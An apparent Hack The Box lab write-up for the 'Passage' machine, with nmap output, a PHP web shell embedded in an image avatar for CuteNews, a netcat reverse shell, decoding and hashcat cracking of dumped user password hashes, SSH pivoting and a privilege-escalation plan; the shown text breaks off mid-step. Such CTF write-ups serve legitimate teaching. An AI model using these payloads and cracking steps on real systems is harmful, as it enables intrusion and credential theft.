NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-06 12:59 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:59
Completed NSE at 12:59, 0.00s elapsed
Initiating NSE at 12:59
Completed NSE at 12:59, 0.00s elapsed
Initiating NSE at 12:59
Completed NSE at 12:59, 0.00s elapsed
Initiating Ping Scan at 12:59
Scanning 10.10.10.206 [4 ports]
Completed Ping Scan at 12:59, 0.39s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:59
Scanning passage.htb (10.10.10.206) [1000 ports]
Discovered open port 80/tcp on 10.10.10.206
Discovered open port 22/tcp on 10.10.10.206
Completed SYN Stealth Scan at 12:59, 10.06s elapsed (1000 total ports)
Initiating Service scan at 12:59
Scanning 2 services on passage.htb (10.10.10.206)
Completed Service scan at 13:00, 6.89s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against passage.htb (10.10.10.206)
adjust_timeouts2: packet supposedly had rtt of -1057921 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1057921 microseconds. Ignoring time.
Retrying OS detection (try #2) against passage.htb (10.10.10.206)
Initiating Traceroute at 13:00
Completed Traceroute at 13:00, 0.64s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 13:00
Completed Parallel DNS resolution of 2 hosts. at 13:00, 0.61s elapsed
NSE: Script scanning 10.10.10.206.
Initiating NSE at 13:00
Completed NSE at 13:00, 19.61s elapsed
Initiating NSE at 13:00
Completed NSE at 13:00, 2.25s elapsed
Initiating NSE at 13:00
Completed NSE at 13:00, 0.00s elapsed
Nmap scan report for passage.htb (10.10.10.206)
Host is up (0.56s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
| 256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_ 256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Passage News
Aggressive OS guesses: Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 - 4.11 (93%), Linux 3.13 (93%), DD-WRT v3.0 (Linux 4.4.2) (93%), Linux 4.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 37.993 days (since Thu Jul 30 13:10:45 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 633.87 ms 10.10.14.1
2 634.03 ms passage.htb (10.10.10.206)
NSE: Script Post-scanning.
Initiating NSE at 13:00
Completed NSE at 13:00, 0.00s elapsed
Initiating NSE at 13:00
Completed NSE at 13:00, 0.00s elapsed
Initiating NSE at 13:00
Completed NSE at 13:00, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.33 seconds
Raw packets sent: 1290 (58.998KB) | Rcvd: 1089 (45.686KB)
PORT 80
Here we have seen that we have a lorem ipsum which is used for just filling up the area with random text. Next we see about Fail2Ban which means that whenever their would be rush on this website from particular IP that IP would be blocked for 2 min. Next here we have login page which you can get without gobuster as we cannot use gobuster or dirb else we would be blocked again and again.
Now we also have Version of its CMS SO lest google for its exploit
Here we will create a new user account and upload a image file for avatar and will trigger our shell from their
Steps to create that image with shell execution command
┌─[root@liquid]─[~/Desktop/HTB/passage]
└──╼ #exiftool -comment='<?php echo system($_GET['cmd']);?>' download.jpeg
1 image files updated
┌─[root@liquid]─[~/Desktop/HTB/passage]
└──╼ #file download.jpeg
download.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "<?php echo system($_GET[cmd]);?>", baseline, precision 8, 275x183, components 3
┌─[root@liquid]─[~/Desktop/HTB/passage]
└──╼ #mv download.jpeg download.jpeg.php
Now we can access this from upload area
In the same we can trigger shell using netcat and we will get shell as www-data
┌─[root@liquid]─[~/Desktop/HTB/passage] └──╼ #nc -lnvp 9001 listening on [any] 9001 ... connect to [10.10.14.167] from (UNKNOWN) [10.10.10.206] 56550 id uid=33(www-data) gid=33(www-data) groups=33(www-data)
Here we need to get user access to get user flag
GETTING USER ACCESS
Now lets search for CMS directory if we could find anything suspicious
pwd /var/www/html/CuteNews cd cdata pwd /var/www/html/CuteNews/cdata cd users pwd /var/www/html/CuteNews/cdata/users ls -l total 156 -rw-r--r-- 1 www-data www-data 717 Sep 5 23:23 09.php -rw-r--r-- 1 www-data www-data 109 Aug 30 16:23 0a.php -rw-r--r-- 1 www-data www-data 137 Sep 5 23:58 0d.php -rw-r--r-- 1 www-data www-data 125 Aug 30 16:23 16.php -rw-r--r-- 1 www-data www-data 137 Sep 5 23:54 18.php -rw-r--r-- 1 www-data www-data 449 Sep 5 23:57 21.php -rw-r--r-- 1 www-data www-data 137 Sep 6 00:01 2c.php -rw-r--r-- 1 www-data www-data 137 Sep 5 23:58 2e.php -rw-r--r-- 1 www-data www-data 109 Aug 31 14:54 32.php -rw-r--r-- 1 www-data www-data 45 Sep 6 00:31 35.php -rw-r--r-- 1 www-data www-data 105 Sep 5 22:56 3f.php -rw-r--r-- 1 www-data www-data 137 Sep 6 00:01 41.php -rw-r--r-- 1 www-data www-data 45 Sep 5 23:14 4b.php -rwxr-xr-x 1 www-data www-data 113 Jun 18 08:28 52.php -rwxr-xr-x 1 www-data www-data 129 Jun 18 08:24 5d.php -rw-r--r-- 1 www-data www-data 45 Sep 5 23:23 5e.php -rwxr-xr-x 1 www-data www-data 129 Jun 18 08:28 66.php -rw-r--r-- 1 www-data www-data 137 Sep 6 00:01 67.php -rw-r--r-- 1 www-data www-data 137 Sep 5 23:58 6c.php -rw-r--r-- 1 www-data www-data 133 Aug 31 14:54 6e.php -rw-r--r-- 1 www-data www-data 137 Sep 5 23:58 73.php -rwxr-xr-x 1 www-data www-data 117 Jun 18 08:27 77.php -rwxr-xr-x 1 www-data www-data 481 Jun 18 09:07 7a.php -rw-r--r-- 1 www-data www-data 109 Sep 5 23:23 82.php -rw-r--r-- 1 www-data www-data 129 Sep 5 23:23 8b.php -rwxr-xr-x 1 www-data www-data 109 Jun 18 08:24 8f.php -rw-r--r-- 1 www-data www-data 589 Sep 6 00:05 94.php -rwxr-xr-x 1 www-data www-data 129 Jun 18 08:28 97.php -rwxr-xr-x 1 www-data www-data 489 Jun 18 09:05 b0.php -rw-r--r-- 1 www-data www-data 121 Sep 5 22:56 b6.php -rwxr-xr-x 1 www-data www-data 481 Jun 18 09:46 c8.php -rw-r--r-- 1 www-data www-data 45 Sep 6 00:31 cc.php -rwxr-xr-x 1 www-data www-data 45 Jun 18 08:26 d4.php -rwxr-xr-x 1 www-data www-data 45 Jun 18 09:08 d5.php -rw-r--r-- 1 www-data www-data 1213 Aug 31 14:55 d6.php -rw-r--r-- 1 www-data www-data 45 Sep 5 23:15 e0.php -rw-r--r-- 1 www-data www-data 45 Sep 6 00:32 f1.php -rwxr-xr-x 1 www-data www-data 113 Jun 18 08:28 fc.php -rw-r--r-- 1 www-data www-data 3840 Aug 30 17:54 lines -rw-r--r-- 1 www-data www-data 0 Jun 18 08:24 users.txt
Here we got some php files so lets just copy their data in single file and using sublime remove unwanted stuff
┌─[✗]─[root@liquid]─[~/Desktop/HTB/passage]
└──╼ #cat passwords
YToyOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO31zOjQ6Im5hbWUiO2E6MTp7czo0OiJ0ZXN0IjthOjk6e3M6MjoiaWQiO3M6MTA6IjE1OTkzNzE4MTgiO3M6NDoibmFtZSI7czo0OiJ0ZXN0IjtzOjM6ImFjbCI7czoxOiI0IjtzOjU6ImVtYWlsIjtzOjEzOiJ0ZXN0QHRlc3QuY29tIjtzOjQ6Im5pY2siO3M6NDoidGVzdCI7czo0OiJwYXNzIjtzOjY0OiI5Zjg2ZDA4MTg4NGM3ZDY1OWEyZmVhYTBjNTVhZDAxNWEzYmY0ZjFiMmIwYjgyMmNkMTVkNmMxNWIwZjAwYTA4IjtzOjQ6Im1vcmUiO3M6NjA6IllUb3lPbnR6T2pRNkluTnBkR1VpTzNNNk1Eb2lJanR6T2pVNkltRmliM1YwSWp0ek9qQTZJaUk3ZlE9PSI7czo2OiJhdmF0YXIiO3M6MzA6ImF2YXRhcl90ZXN0X2xpcXVpZHJhZ2UuZ2lmLnBocCI7czo2OiJlLWhpZGUiO3M6MDoiIjt9fX0=
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODgyOTgzMztzOjY6ImVncmU1NSI7fX0=
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo2OiJlZ3JlNTUiO319
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo1OiJhZG1pbiI7YTo4OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMDQ3IjtzOjQ6Im5hbWUiO3M6NToiYWRtaW4iO3M6MzoiYWNsIjtzOjE6IjEiO3M6NToiZW1haWwiO3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjQ6InBhc3MiO3M6NjQ6IjcxNDRhOGI1MzFjMjdhNjBiNTFkODFhZTE2YmUzYTgxY2VmNzIyZTExYjQzYTI2ZmRlMGNhOTdmOWUxNDg1ZTEiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3OTg4IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODkxMDg5NjtzOjY6ImhhY2tlciI7fX0=
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5OTM3MTgxODtzOjQ6InRlc3QiO319
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzI4MTtzOjk6InNpZC1tZWllciI7fX0=
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjU6ImFkbWluIjt9fQ==
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImtpbUBleGFtcGxlLmNvbSI7czo5OiJraW0tc3dpZnQiO319
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MjA6ImhhY2tlckBoYWNrZXIuaGFja2VyIjtzOjY6ImhhY2tlciI7fX0=
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzIzNjtzOjEwOiJwYXVsLWNvbGVzIjt9fQ==
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJzaWQtbWVpZXIiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzI4MSI7czo0OiJuYW1lIjtzOjk6InNpZC1tZWllciI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToic2lkQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiU2lkIE1laWVyIjtzOjQ6InBhc3MiO3M6NjQ6IjRiZGQwYTBiYjQ3ZmM5ZjY2Y2JmMWE4OTgyZmQyZDM0NGQyYWVjMjgzZDFhZmFlYmI0NjUzZWMzOTU0ZGZmODgiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg1NjQ1IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzA0NztzOjU6ImFkbWluIjt9fQ==
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6InNpZEBleGFtcGxlLmNvbSI7czo5OiJzaWQtbWVpZXIiO319
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTM6InRlc3RAdGVzdC5jb20iO3M6NDoidGVzdCI7fX0=
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJraW0tc3dpZnQiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzMwOSI7czo0OiJuYW1lIjtzOjk6ImtpbS1zd2lmdCI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToia2ltQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiS2ltIFN3aWZ0IjtzOjQ6InBhc3MiO3M6NjQ6ImY2NjlhNmY2OTFmOThhYjA1NjIzNTZjMGNkNWQ1ZTdkY2RjMjBhMDc5NDFjODZhZGNmY2U5YWYzMDg1ZmJlY2EiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3MDk2IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIzIjt9fX0=
YToxOntzOjQ6Im5hbWUiO2E6Mjp7czo2OiJlZ3JlNTUiO2E6MTE6e3M6MjoiaWQiO3M6MTA6IjE1OTg4Mjk4MzMiO3M6NDoibmFtZSI7czo2OiJlZ3JlNTUiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo0OiJuaWNrIjtzOjY6ImVncmU1NSI7czo0OiJwYXNzIjtzOjY0OiI0ZGIxZjBiZmQ2M2JlMDU4ZDRhYjA0ZjE4ZjY1MzMxYWMxMWJiNDk0YjU3OTJjNDgwZmFmN2ZiMGM0MGZhOWNjIjtzOjQ6Im1vcmUiO3M6NjA6IllUb3lPbnR6T2pRNkluTnBkR1VpTzNNNk1Eb2lJanR6T2pVNkltRmliM1YwSWp0ek9qQTZJaUk3ZlE9PSI7czozOiJsdHMiO3M6MTA6IjE1OTg5MDY4ODEiO3M6MzoiYmFuIjtzOjE6IjAiO3M6NjoiYXZhdGFyIjtzOjI2OiJhdmF0YXJfZWdyZTU1X3lreG5hY3B0LnBocCI7czo2OiJlLWhpZGUiO3M6MDoiIjt9czo2OiJoYWNrZXIiO2E6MTE6e3M6MjoiaWQiO3M6MTA6IjE1OTg5MTA4OTYiO3M6NDoibmFtZSI7czo2OiJoYWNrZXIiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MjA6ImhhY2tlckBoYWNrZXIuaGFja2VyIjtzOjQ6Im5pY2siO3M6NjoiaGFja2VyIjtzOjQ6InBhc3MiO3M6NjQ6ImU3ZDM2ODU3MTU5Mzk4NDI3NDljYzI3YjM4ZDBjY2I5NzA2ZDRkMTRhNTMwNGVmOWVlZTA5Mzc4MGVhYjVkZjkiO3M6MzoibHRzIjtzOjEwOiIxNTk4OTEwOTExIjtzOjM6ImJhbiI7czoxOiIwIjtzOjQ6Im1vcmUiO3M6NjA6IllUb3lPbnR6T2pRNkluTnBkR1VpTzNNNk1Eb2lJanR6T2pVNkltRmliM1YwSWp0ek9qQTZJaUk3ZlE9PSI7czo2OiJhdmF0YXIiO3M6MjY6ImF2YXRhcl9oYWNrZXJfanB5b3lza3QucGhwIjtzOjY6ImUtaGlkZSI7czowOiIiO319fQ==
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzMwOTtzOjk6ImtpbS1zd2lmdCI7fX0=
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO319
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5ODgyOTgzMztzOjY6ImVncmU1NSI7fX0=
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo2OiJlZ3JlNTUiO319
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo1OiJhZG1pbiI7YTo4OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMDQ3IjtzOjQ6Im5hbWUiO3M6NToiYWRtaW4iO3M6MzoiYWNsIjtzOjE6IjEiO3M6NToiZW1haWwiO3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjQ6InBhc3MiO3M6NjQ6IjcxNDRhOGI1MzFjMjdhNjBiNTFkODFhZTE2YmUzYTgxY2VmNzIyZTExYjQzYTI2ZmRlMGNhOTdmOWUxNDg1ZTEiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3OTg4IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzI4MTtzOjk6InNpZC1tZWllciI7fX0=
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTc6Im5hZGF2QHBhc3NhZ2UuaHRiIjtzOjU6ImFkbWluIjt9fQ==
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6ImtpbUBleGFtcGxlLmNvbSI7czo5OiJraW0tc3dpZnQiO319
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzIzNjtzOjEwOiJwYXVsLWNvbGVzIjt9fQ==
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJzaWQtbWVpZXIiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzI4MSI7czo0OiJuYW1lIjtzOjk6InNpZC1tZWllciI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToic2lkQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiU2lkIE1laWVyIjtzOjQ6InBhc3MiO3M6NjQ6IjRiZGQwYTBiYjQ3ZmM5ZjY2Y2JmMWE4OTgyZmQyZDM0NGQyYWVjMjgzZDFhZmFlYmI0NjUzZWMzOTU0ZGZmODgiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg1NjQ1IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIyIjt9fX0=
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzA0NztzOjU6ImFkbWluIjt9fQ==
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTU6InNpZEBleGFtcGxlLmNvbSI7czo5OiJzaWQtbWVpZXIiO319
YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo5OiJraW0tc3dpZnQiO2E6OTp7czoyOiJpZCI7czoxMDoiMTU5MjQ4MzMwOSI7czo0OiJuYW1lIjtzOjk6ImtpbS1zd2lmdCI7czozOiJhY2wiO3M6MToiMyI7czo1OiJlbWFpbCI7czoxNToia2ltQGV4YW1wbGUuY29tIjtzOjQ6Im5pY2siO3M6OToiS2ltIFN3aWZ0IjtzOjQ6InBhc3MiO3M6NjQ6ImY2NjlhNmY2OTFmOThhYjA1NjIzNTZjMGNkNWQ1ZTdkY2RjMjBhMDc5NDFjODZhZGNmY2U5YWYzMDg1ZmJlY2EiO3M6MzoibHRzIjtzOjEwOiIxNTkyNDg3MDk2IjtzOjM6ImJhbiI7czoxOiIwIjtzOjM6ImNudCI7czoxOiIzIjt9fX0=
YToxOntzOjQ6Im5hbWUiO2E6MTp7czo2OiJlZ3JlNTUiO2E6MTE6e3M6MjoiaWQiO3M6MTA6IjE1OTg4Mjk4MzMiO3M6NDoibmFtZSI7czo2OiJlZ3JlNTUiO3M6MzoiYWNsIjtzOjE6IjQiO3M6NToiZW1haWwiO3M6MTU6ImVncmU1NUB0ZXN0LmNvbSI7czo0OiJuaWNrIjtzOjY6ImVncmU1NSI7czo0OiJwYXNzIjtzOjY0OiI0ZGIxZjBiZmQ2M2JlMDU4ZDRhYjA0ZjE4ZjY1MzMxYWMxMWJiNDk0YjU3OTJjNDgwZmFmN2ZiMGM0MGZhOWNjIjtzOjQ6Im1vcmUiO3M6NjA6IllUb3lPbnR6T2pRNkluTnBkR1VpTzNNNk1Eb2lJanR6T2pVNkltRmliM1YwSWp0ek9qQTZJaUk3ZlE9PSI7czozOiJsdHMiO3M6MTA6IjE1OTg4MzQwNzkiO3M6MzoiYmFuIjtzOjE6IjAiO3M6NjoiYXZhdGFyIjtzOjI2OiJhdmF0YXJfZWdyZTU1X3Nwd3ZndWp3LnBocCI7czo2OiJlLWhpZGUiO3M6MDoiIjt9fX0=
YToxOntzOjI6ImlkIjthOjE6e2k6MTU5MjQ4MzMwOTtzOjk6ImtpbS1zd2lmdCI7fX0=
we will get these random hashes which are base 64 encoded
After decoding them we will get some usefull text
a:1:{s:5:"email";a:1:{s:15:"sid@example.com";s:9:"sid-meier";}}a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"paul@passage.htb";s:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}a:1:{s:4:"name";a:1:{s:9:"kim-swift";a:9:{s:2:"id";s:10:"1592483309";s:4:"name";s:9:"kim-swift";s:3:"acl";s:1:"3";s:5:"email";s:15:"kim@example.com";s:4:"nick";s:9:"Kim Swift";s:4:"pass";s:64:"f669a6f691f98ab0562356c0cd5d5e7dcdc20a07941c86adcfce9af3085fbeca";s:3:"lts";s:10:"1592487096";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"3";}}}
Here we see some hashes which we dont know about them
lets transfer them in an file and use hashcat to crack them but before that you can use hashid command to get these hashes format
HASHID
┌─[root@liquid]─[~/Desktop/HTB/passage] └──╼ #hashid e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd Analyzing 'e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd' [+] Snefru-256 [+] SHA-256 [+] RIPEMD-256 [+] Haval-256 [+] GOST R 34.11-94 [+] GOST CryptoPro S-Box [+] SHA3-256 [+] Skein-256 [+] Skein-512(256)
HASHCAT
┌─[✗]─[root@liquid]─[~/Desktop/HTB/passage]
└──╼ #hashcat -m 1400 -a 0 hashes ../../THM/Wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz, 5834/5898 MB (2048 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 2 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 66 MB
Dictionary cache built:
* Filename..: ../../THM/Wordlists/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec
e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd:atlanta1
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: SHA2-256
Hash.Target......: hashes
Time.Started.....: Sun Sep 6 11:56:54 2020 (4 secs)
Time.Estimated...: Sun Sep 6 11:56:58 2020 (0 secs)
Guess.Base.......: File (../../THM/Wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4166.7 kH/s (0.91ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/2 (50.00%) Digests
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[206b6d3831303838] -> $HEX[042a0337c2a156616d6f732103]
Started: Sun Sep 6 11:56:29 2020
Stopped: Sun Sep 6 11:56:59 2020
Here we got some password lets su to paul
┌─[✗]─[root@liquid]─[~/Desktop/HTB/passage]
└──╼ #rlwrap nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.167] from (UNKNOWN) [10.10.10.206] 56818
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@passage:/var/www/html/CuteNews/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@passage:/var/www/html/CuteNews/uploads$ su paul
su paul
Password: atlanta1
paul@passage:/var/www/html/CuteNews/uploads$ id
id
uid=1001(paul) gid=1001(paul) groups=1001(paul)
paul@passage:/var/www/html/CuteNews/uploads$ cd
cd
paul@passage:~$ cat user.txt
cat user.txt
4d9294ce4436ff3da172d66503c1a579
paul@passage:~$
Now we need to get 2nd user so if we see in .ssh directory that we have same ssh keys so just ssh to nadav like this
paul@passage:~$ cd .ssh cd .ssh paul@passage:~/.ssh$ cat id_rsa.pub cat id_rsa.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzXiscFGV3l9T2gvXOkh9w+BpPnhFv5AOPagArgzWDk9uUq7/4v4kuzso/lAvQIg2gYaEHlDdpqd9gCYA7tg76N5RLbroGqA6Po91Q69PQadLsziJnYumbhClgPLGuBj06YKDktI3bo/H3jxYTXY3kfIUKo3WFnoVZiTmvKLDkAlO/+S2tYQa7wMleSR01pP4VExxPW4xDfbLnnp9zOUVBpdCMHl8lRdgogOQuEadRNRwCdIkmMEY5efV3YsYcwBwc6h/ZB4u8xPyH3yFlBNR7JADkn7ZFnrdvTh3OY+kLEr6FuiSyOEWhcPybkM5hxdL9ge9bWreSfNC1122qq49d nadav@passage paul@passage:~/.ssh$ ssh nadav@127.0.0.1 ssh nadav@127.0.0.1 Last login: Sat Sep 5 23:15:08 2020 from 127.0.0.1 nadav@passage:~$ id id uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) nadav@passage:~$
Here we got nadav user access
GETTING ROOT ACCESS
Now if we use simple command like
find / -perm -u=s 2>/dev/null
nadav@passage:~$ find / -perm -u=s 2>/dev/null /bin/mount /bin/umount /bin/ntfs-3g /bin/ping /bin/su /bin/fusermount /bin/ping6 /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/xorg/Xorg.wrap /usr/lib/policykit-1/polkit-agent-helper-1 /usr/bin/passwd /usr/bin/pkexec /usr/bin/newgrp /usr/bin/chfn /usr/bin/sudo /usr/bin/gpasswd /usr/bin/chsh /usr/bin/vmware-user-suid-wrapper /usr/sbin/pppd nadav@passage:~$
we see dbus one here which is obviously exploitable for that we can get to this link
https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/
What we can do with this is we can write data to root folder so we will simply write id_rsa keys to root folder and will ssh to root Thats it
Steps To follow
copy id_rsa.pub file and place it in root’s .ssh folder named as authorized_keys as shown below
